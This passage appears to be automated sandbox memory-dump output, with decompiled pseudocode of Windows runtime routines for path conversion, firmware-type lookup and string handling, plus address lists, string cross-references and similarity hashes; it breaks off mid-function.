0x00f6fb21
0x00f12ece
0x00f12ece
0x00f12ece
0x00f12ed7
0x00f12e61
0x00f12e63
0x00f6fa6b
0x00f6fa71
0x00f6fa76
0x00f6fa78
0x00f6fa8a
0x00f6fa7a
0x00f6fa83
0x00f6fa83
0x00f6fa8f
0x00f6fa91
0x00f6fa97
0x00f6fa9d
0x00f6faa4
0x00f6faaa
0x00f6faaf
0x00f6fab1
0x00f6fac3
0x00f6fab3
0x00f6fabc
0x00f6fabc
0x00f6fac8
0x00f6facb
0x00f6fadf
0x00f6fadf
0x00f6facb
0x00f6faa4
0x00f6fa91
0x00f12e6f
0x00f12e6f
0x00f12e5f
0x00f6fa13
0x00f6fa15
0x00f6fa17
0x00f6fa1f
0x00f6fa21
0x00f6fa22
0x00f6fa25
0x00f6fa28
0x00f6fa2f
0x00f6fa2f
0x00f6fa2a
0x00f6fa2a
0x00f6fa2a
0x00f6fa31
0x00f6fa34
0x00f6fa36
0x00f6fa3c
0x00f6fa3e
0x00f6fa41
0x00f6fa43
0x00f6fa45
0x00f6fa45
0x00f6fa41
0x00f6fa3c
0x00f6fa4a
0x00f6fa4f
0x00f6fa51
0x00f6fa53
0x00f6fa56
0x00f6fa5b
0x00f6fa5e
0x00000000
0x00f6fa5e
0x00f12e23

Strings

RTL: Re-Waiting, xrefs: 00F6FA4A
RegLoadRegistryInfo, xrefs: 00F12E7C

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting$RegLoadRegistryInfo
API String ID: 0-3584235622
Opcode ID: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
Instruction ID: 230132cb03707dc29e397adc468d5f3953631a33d8de13c998b87937c80c5fb3
Opcode Fuzzy Hash: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
Instruction Fuzzy Hash: 6D615331E006049FDB32DFA8E880BBE77A1EB40330F240279E855972C1C7389D85B781

Uniqueness

Uniqueness Score: -1.00%

Function 00F951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xff05f0);
				E00F6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00F953CA(0);
						return E00F6D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00F5F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00F33690(1, _t117, 0xef1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00F5AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00F34620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00F5AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00F9500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00F59860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00f951be
0x00f951c3
0x00f951c8
0x00f951cd
0x00f951d0
0x00f951d3
0x00f951d8
0x00f951db
0x00f951de
0x00f951e0
0x00f951e3
0x00f951e6
0x00f951e8
0x00f95342
0x00f95351
0x00f95356
0x00f9535a
0x00f95360
0x00f95363
0x00f95366
0x00f95369
0x00f95369
0x00f9536b
0x00f9536b
0x00f95370
0x00f953a3
0x00f953a4
0x00f953a6
0x00f953ab
0x00f953ab
0x00f953ae
0x00f953ae
0x00f953b5
0x00f953bf
0x00f953bf
0x00f95375
0x00f95396
0x00f953a0
0x00f953a0
0x00000000
0x00f95396
0x00f95377
0x00f95379
0x00f9537f
0x00f9538c
0x00f95390
0x00000000
0x00f95390
0x00f951ee
0x00f951f1
0x00f95301
0x00f95310
0x00f95315
0x00f95318
0x00f9531b
0x00f95320
0x00f9532e
0x00f95331
0x00000000
0x00f95331
0x00f95328
0x00f95329
0x00000000
0x00f95329
0x00f951fa
0x00f95235
0x00f95236
0x00f95239
0x00f9523f
0x00f95240
0x00f95241
0x00f95242
0x00f95246
0x00f95247
0x00f9524e
0x00f95251
0x00f95267
0x00f95269
0x00f9526e
0x00f9527d
0x00f9527e
0x00f95281
0x00f95282
0x00f95287
0x00f95288
0x00f9528a
0x00f9528f
0x00f95294
0x00000000
0x00000000
0x00f9529a
0x00f9529c
0x00f9529e
0x00f9529e
0x00f952a4
0x00f952b0
0x00000000
0x00000000
0x00f952ba
0x00f952bc
0x00f952bc
0x00f952d4
0x00f952d9
0x00f952dc
0x00f952e1
0x00000000
0x00000000
0x00f952e7
0x00f952f4
0x00000000
0x00f952f4
0x00f95270
0x00000000
0x00f95270
0x00f951fc
0x00f951fd
0x00f95202
0x00f95203
0x00f95205
0x00f9520a
0x00f9520f
0x00000000
0x00000000
0x00f9521b
0x00f95226
0x00f9522b
0x00f9521d
0x00f9521d
0x00f95222
0x00f95222
0x00f9522d
0x00000000

Strings

UEFI, xrefs: 00F9521D
Legacy, xrefs: 00F95226

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d1e398ca897f3cbc9c07720242af9e9565d55673e8fc59e8a264cf5771b8aaff
Instruction ID: 2a78cda96501e88dd556c458aa46af25c07cf488310c2205a5442f324046d3d6
Opcode Fuzzy Hash: d1e398ca897f3cbc9c07720242af9e9565d55673e8fc59e8a264cf5771b8aaff
Instruction Fuzzy Hash: 29516E71E00A199FEF15DFA8C941BADB7F5FF48B40F24402DE649EB291D6719900EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F34120, Relevance: 1.7, Strings: 1, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00F34120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x100d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00F4F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00F36E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00F34620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00F36E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00F345F8))) {
												case 0:
													_v568 = 0xef1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xef11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00F34620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00F5F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00F5F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00F152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00F2EB70(1, 0x10079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00F2AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00F595D0();
																			L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00F5B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00F53D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00F5B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x00f34128
0x00f34135
0x00f3413c
0x00f34141
0x00f34145
0x00f34147
0x00f3414e
0x00f34151
0x00f34159
0x00f3415c
0x00f34160
0x00f34164
0x00f34168
0x00f3416c
0x00f3417f
0x00f34181
0x00f3446a
0x00f3446a
0x00f3418c
0x00f34195
0x00f34199
0x00f34432
0x00f34439
0x00f3443d
0x00f34442
0x00f34447
0x00000000
0x00f3419f
0x00f341a3
0x00f341b1
0x00f341b9
0x00f341bd
0x00f345db
0x00f345db
0x00000000
0x00f341c3
0x00f341c3
0x00f341ce
0x00f341d4
0x00f7e138
0x00f7e13e
0x00f7e169
0x00f7e16d
0x00f7e19e
0x00f7e16f
0x00f7e16f
0x00f7e175
0x00f7e179
0x00f7e18f
0x00f7e193
0x00000000
0x00f7e199
0x00000000
0x00f7e199
0x00f7e193
0x00000000
0x00000000
0x00000000
0x00f341da
0x00f341da
0x00f341df
0x00f341e4
0x00f341ec
0x00f34203
0x00f34207
0x00f7e1fd
0x00f34222
0x00f34226
0x00f7e1f3
0x00f7e1f3
0x00f3422c
0x00f3422c
0x00f34233
0x00f7e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f34239
0x00f34239
0x00f34239
0x00f34239
0x00f34233
0x00f34226
0x00f341ee
0x00f341ee
0x00f341f4
0x00f34575
0x00f7e1b1
0x00f7e1b1
0x00000000
0x00f3457b
0x00f3457b
0x00f34582
0x00f7e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00f34588
0x00f34588
0x00f3458c
0x00f7e1c4
0x00f7e1c4
0x00000000
0x00f34592
0x00f34592
0x00f34599
0x00f7e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x00f3459f
0x00f3459f
0x00f345a3
0x00f7e1d7
0x00f7e1e4
0x00000000
0x00f345a9
0x00f345a9
0x00f345b0
0x00f7e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00f345b6
0x00f345b6
0x00f345b6
0x00000000
0x00f345b6
0x00f345b0
0x00f345a3
0x00f34599
0x00f3458c
0x00f34582
0x00000000
0x00000000
0x00000000
0x00000000
0x00f341f4
0x00f3423e
0x00f34241
0x00f345c0
0x00f345c4
0x00000000
0x00f345ca
0x00f345ca
0x00000000
0x00f7e207
0x00f7e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x00f345d1
0x00000000
0x00000000
0x00f345ca
0x00000000
0x00f34247
0x00f34247
0x00f34247
0x00f34249
0x00f34249
0x00f34249
0x00f34251
0x00f34251
0x00f34257
0x00f3425f
0x00f3426e
0x00f34270
0x00f3427a
0x00f7e219
0x00f7e219
0x00f34280
0x00f34282
0x00f34456
0x00f345ea
0x00000000
0x00f345f0
0x00f7e223
0x00000000
0x00f7e223
0x00f3445c
0x00f3445c
0x00000000
0x00f3445c
0x00000000
0x00f34288
0x00f3428c
0x00f7e298
0x00f34292
0x00f34292
0x00f3429e
0x00f342a3
0x00f342a7
0x00f342ac
0x00f7e22d
0x00f342b2
0x00f342b2
0x00f342b9
0x00f342bc
0x00f342c2
0x00f342ca
0x00f342cd
0x00f342cd
0x00f342d4
0x00f3433f
0x00f3433f
0x00f342d6
0x00f342d6
0x00f342d9
0x00f342dd
0x00f342eb
0x00f7e23a
0x00f342f1
0x00f34305
0x00f3430d
0x00f34315
0x00f34318
0x00f3431f
0x00f34322
0x00f3432e
0x00f3433b
0x00f3433b
0x00000000
0x00f3432e
0x00f342eb
0x00f3434c
0x00f3434e
0x00f34352
0x00f34359
0x00f3435e
0x00f34361
0x00f3436e
0x00f3438a
0x00f3438e
0x00f34396
0x00f3439e
0x00f343a1
0x00f343ad
0x00f343bb
0x00f343bb
0x00f343ad
0x00f3436e
0x00f343bf
0x00f343c5
0x00f34463
0x00f34463
0x00f343ce
0x00f343d5
0x00f343d9
0x00f343df
0x00f34475
0x00f34479
0x00f34491
0x00f34491
0x00f34479
0x00f343e5
0x00f343eb
0x00f343f4
0x00f343f6
0x00f343f9
0x00f343fc
0x00f343ff
0x00f344e8
0x00f344ed
0x00f344f3
0x00f7e247
0x00000000
0x00f344f9
0x00f34504
0x00f34508
0x00f3450f
0x00f7e269
0x00000000
0x00f34515
0x00f34519
0x00f34531
0x00f34534
0x00f34537
0x00f3453e
0x00f34541
0x00f3454a
0x00f7e255
0x00f7e255
0x00f7e25b
0x00f7e25e
0x00f7e261
0x00f7e261
0x00f34555
0x00f34559
0x00f3455d
0x00f7e26d
0x00f7e270
0x00f7e274
0x00f7e27a
0x00f7e27d
0x00f7e28e
0x00f7e28e
0x00f34563
0x00f34563
0x00f34569
0x00f34569
0x00000000
0x00f3455d
0x00f3450f
0x00000000
0x00f344f3
0x00f343ff
0x00f34405
0x00f34405
0x00f34405
0x00f342ac
0x00f3428c
0x00f34282
0x00f34407
0x00f3440d
0x00f7e2af
0x00f7e2af
0x00f34413
0x00f34413
0x00000000
0x00f341d4
0x00000000
0x00f341c3
0x00f341bd
0x00f34415
0x00f34415
0x00f34416
0x00f34417
0x00f34429
0x00f3416e
0x00f3416e
0x00f34175
0x00f34498
0x00f3449f
0x00f7e12d
0x00000000
0x00f7e133
0x00000000
0x00f7e133
0x00f344a5
0x00f344a5
0x00f344aa
0x00000000
0x00f344bb
0x00f344ca
0x00f344d6
0x00f344d7
0x00f344d8
0x00f344e3
0x00f344e3
0x00f344aa
0x00f3417b
0x00f3417b
0x00f3417b
0x00000000
0x00f3417b
0x00f34175
0x00000000

Strings

RegLoadRegistryInfo, xrefs: 00F34140

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RegLoadRegistryInfo
API String ID: 0-282410176
Opcode ID: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
Instruction ID: 41ecab7f55eefd9f2253da5f99df06d00edfc5a958edb3376a846a4154afc031
Opcode Fuzzy Hash: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
Instruction Fuzzy Hash: 55F181719083118BC724CF59C481A3AB7E1FF98724F54896EF88ACB251E734EC95EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F1B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xfef7a8);
				E00F6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00F6D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00F5D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00F5F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
